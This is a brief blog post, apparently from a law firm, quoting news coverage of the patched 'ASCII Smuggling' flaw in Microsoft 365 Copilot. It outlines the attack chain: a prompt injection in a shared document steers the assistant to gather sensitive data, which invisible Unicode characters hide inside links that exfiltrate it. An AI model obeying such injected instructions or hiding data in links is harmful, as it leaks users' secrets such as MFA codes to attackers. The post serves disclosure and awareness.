SCMagazine.com reported that “A patched vulnerability in Microsoft 365 Copilot could expose sensitive data by running a novel AI-enabled technique known as “ASCII Smuggling” that uses special Unicode characters that mirror ASCII text, but are actually not visible to the user interface.” The August 28, 2024 article entitled “ASCII Smuggling’ attack exposes sensitive Microsoft Copilot data” (https://www.scmagazine.com/news/ascii-smuggling-attack-exposes-sensitive-microsoft-copilot-data) included these comments from researcher Johann Rehberger (who spent many years at Microsoft):
… that ASCII Smuggling would let an attacker make the large language model (LLM) render the data invisible to the user interface and embed it with clickable hyperlinks with malicious code — setting the stage for data exfiltration.
Also these comments from Jason Soroko (senior fellow at Sectigo)
…, said that the ASCII Smuggling flaw in Microsoft 365 Copilot lets attackers hide the malicious code within seemingly harmless text using special Unicode characters. These characters resemble ASCII, said Soroko, but are invisible in the user interface, allowing the attacker to embed hidden data within clickable hyperlinks.
When a user interacts with these links, the hidden data can be exfiltrated to a third-party server, potentially compromising sensitive information, such as MFA one-time-password codes,”
Soroko said the attack works by stringing together multiple methods: First, a prompt injection gets triggered by sharing a malicious document in a chat. Then, Copilot is manipulated to search for more sensitive data, and finally, ASCII Smuggling is used to trick the user into clicking on an exfiltration link.
Interesting and scary for AI!
First published https://www.vogelitlaw.com/blog/ascii-smuggling-attack-exposes-microsoft-ai-copilot-data